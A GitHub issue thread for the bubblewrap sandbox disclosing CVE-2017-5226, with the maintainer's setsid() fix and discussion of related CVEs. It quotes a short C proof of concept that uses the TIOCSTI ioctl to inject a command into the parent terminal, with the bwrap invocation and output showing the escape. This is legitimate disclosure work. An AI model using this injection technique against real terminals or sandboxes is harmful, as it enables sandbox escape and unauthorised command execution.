Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2017-5226 -- bubblewrap escape via TIOCSTI ioctl #142

Closed
smcv opened this issue Jan 9, 2017 · 3 comments

Comments

Projects
None yet
1 participant
@smcv
Copy link
Contributor

commented Jan 9, 2017

On Debian bug https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850702, Federico Bento <up201407890@alunos.dcc.fc.up.pt> writes:

When executing a program via the bubblewrap sandbox, the nonpriv
session can escape to the parent session by using the TIOCSTI ioctl to
push characters into the terminal's input buffer, allowing an attacker
to escape the sandbox.

This has been assigned CVE-2017-5226.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>
#include <termios.h>

int main()
{
  char *cmd = "id\n";
  while(*cmd)
   ioctl(0, TIOCSTI, cmd++);
  execlp("/bin/id", "id", NULL);
}
$ gcc test.c -o /tmp/test
$ bwrap --ro-bind /lib64 /lib64 --ro-bind /home /home --ro-bind /bin /bin
--ro-bind /tmp /tmp --chdir / --unshare-pid --uid 0 /tmp/test
id
uid=0 gid=1000 groups=1000
$ id  <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)

I don't know who assigned the CVE ID or whether the bug reporter has made any attempt to report it upstream already.

smcv added a commit to smcv/bubblewrap that referenced this issue Jan 9, 2017

Call setsid() before executing sandboxed code (CVE-2017-5226)
This prevents the sandboxed code from getting a controlling tty,
which in turn prevents it from accessing the TIOCSTI ioctl and hence
faking terminal input.

Fixes: projectatomic#142
@smcv

This comment has been minimized.

Copy link
Contributor Author

commented Jan 9, 2017

Calling setsid() appears to be sufficient to avoid this, if we are willing to sacrifice tty job control for the sandboxed processes. With a slightly modified exploit that calls perror() if the ioctl fails:

ioctl TIOCSTI: Operation not permitted
ioctl TIOCSTI: Operation not permitted
ioctl TIOCSTI: Operation not permitted

I'm going to apply that in Debian for now.

@smcv

This comment has been minimized.

Copy link
Contributor Author

commented Jan 9, 2017

This is arguably not a vulnerability in Bubblewrap itself, because it does not give the user calling Bubblewrap any more privileges outside the sandbox than they had inside.

However, I think it is correct to treat it as a vulnerability in Flatpak, and in any other sandboxes based on Bubblewrap that might be invoked with a controlling terminal.

@smcv

This comment has been minimized.

Copy link
Contributor Author

commented Jan 9, 2017

I should note here for completeness that at least one member of the Debian security team seems to think this and its clones (CVE-2005-4890, CVE-2016-7545, CVE-2016-2781, CVE-2016-2779, CVE-2016-2568) are really all examples of one kernel issue, namely "TIOCSTI should be a privileged operation". https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850702#27

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.